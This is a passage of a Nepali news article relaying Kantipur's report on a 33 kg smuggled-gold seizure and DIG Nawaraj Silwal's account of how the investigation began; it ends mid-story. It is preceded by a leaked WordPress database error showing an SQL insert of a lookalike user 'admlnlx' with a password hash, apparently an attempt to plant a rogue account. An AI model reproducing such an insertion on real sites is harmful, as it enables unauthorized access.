WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bw2oaceLi2ZlGBbSn2KZJhdCFykQe/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 02:59:56', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १४–
कमिसन पाउने भएकैले तस्करीको सुन बरामदका अधिकांश घटनामा सुराकी को थियो भन्ने तथ्य सुरुमै आउथ्यो। पुस २१ मा त्रिभुवन अन्तराष्ट्रिय विमानस्थलको भन्सारबाट पास भएको ३३ किलो पाँच सय ७७ ग्राम ४० मिलिग्राम सुन नेपाल प्रहरीको केन्द्रिय अनुसन्धान ब्युरोले सार्वजनिक गर्ने वित्तिकै सुराकी को हो भन्ने प्रश्न उठिहाल्यो। तर ब्युरो प्रमुख डिआईजी नवराज सिलवालले गौशाला बृत्तमा सुन सार्वजनिक गरेलगत्तै भने, ‘बरामद सुनको कुनै सुराकी छैन।’ सुराकी बिना सिलवालले कसरी त्यत्ति ठूलो परिमाणमा सुन बरामद गरे त ? यो प्रश्नमा सिलवालले जे बताए त्यसले सुन तस्करीको संगठित स्वरुपलाई मात्रै बुझाउँदैन, बरामद सुनको पर्दा पछिका केही पहेलीलाई पनि बुझ्न सघाउँछ। आजको कान्तिपुर दैनिकमा खबर छ ।
सिलवालले तीन महिना अघिको घटना सुनाए। उनका अनुसार लन्डन स्कुल अफ ईकोनोमिक्समा पढेर नेपाल फर्केका एक युवाले तारन्तर फोन गरेर सिलवाललाई भेट्न खोजिरहेका थिए। अफिसमै आएर भेटेका ती युवाले सुन तस्करीका कारण अर्थतन्त्र चौपट भएको, बजारबाट डलर अवैध रुपमा बाहिरिएको र अवैध सुन भित्रिरहेको तथ्य सुनाएका थिए। सिलवालका अनुसार ती युवाको दावी थियो, चीनको केरूङ नाकाबाट भित्रिएको अवैध सुनले यस्तो भएको होईन, विमानस्थलबाटै भित्रीएको ठूलो परिमाणको सुनले खतरा निम्त्याएको हो। तन्नेरीको त्यस्तो तर्क र दाबीपछि आफू अनौठो अन्यौलमा परेको सिलवाल बताउँछन्। उनले भने, ‘त्यसपछिका केही दिन म आफैं विमानस्थलमा रेकी गर्न गएँ। मलाई देख्दा कर्मचारीहरु बढी नै सर्तक भएजस्ता देखिन्थे।’ पछि सिलवालले थप सूचना पाए, विमानस्थलबाट बाहिरिने सुन दुबईबाट आउँछ। त्यो सूचनालगत्तै उनले अन्तर्राष्ट्रिय कार्यशालाहरुमा भेट भएका दुबईका केही प्रहरी अधिकारीको सम्पर्क पहिल्याए। दुबई पुगेर ती अधिकारीलाई भेटन पाए के हुन्थ्यो भन्ने लागिरहेका बेला सिलवालले दुबईमै नेपाल फिल्म टेक्निकल एशोसियनको नेफ्टा अवार्डमा जान निम्ता पाए। नेफ्टाका एक आयोजकले अन्तिम समयमा मात्रै सिलवालको नाम थपिएको पुष्टी गरे।